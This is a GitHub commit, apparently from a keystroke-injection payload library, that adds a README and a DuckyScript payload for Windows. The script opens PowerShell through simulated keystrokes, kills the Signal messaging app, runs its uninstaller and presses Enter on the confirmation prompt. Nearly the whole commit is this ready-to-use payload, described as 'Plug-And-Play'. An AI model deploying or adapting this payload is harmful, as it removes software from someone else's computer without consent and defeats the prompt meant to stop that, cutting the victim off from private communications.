Merge pull request #170 from aleff-github/patch-37

Uninstall Signal
pull/178/head
Kalani Helekunihi 2023-06-12 14:05:11 -04:00 committed by GitHub
commit ccee552321
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 50 additions and 0 deletions

View File

@ -0,0 +1,20 @@
# Uninstall Signal
A script used to uninstall signal-desktop app on Windows users.
**Category**: Execution
## Description
A script used to uninstall signal-desktop app on Windows users.
Open a PowerShell, stop the Signal proccess if it runs and then execute the uninstall file trhough general path.
## Dependencies
* Signal App installed (obviously LOL)
* ExecutionPolicy Bypass
## Settings
- Nothing to set, this payload is Plug-And-Play <3

View File

@ -0,0 +1,30 @@
REM #####################################
REM # |
REM # Title : Uninstall Signal |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10-11 |
REM # |
REM #####################################
REM Plug-And-Play <3
REM Requirements:
REM - Signal App installed
REM - ExecutionPolicy Bypass
DELAY 2000
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 2000
STRINGLN Stop-Process -Name "Signal"
DELAY 500
STRINGLN Start-Process "$env:LocalAppData\Programs\signal-desktop\Uninstall Signal.exe"
DELAY 1000
REM Popup "Are you sure?"
ENTER
ALT F4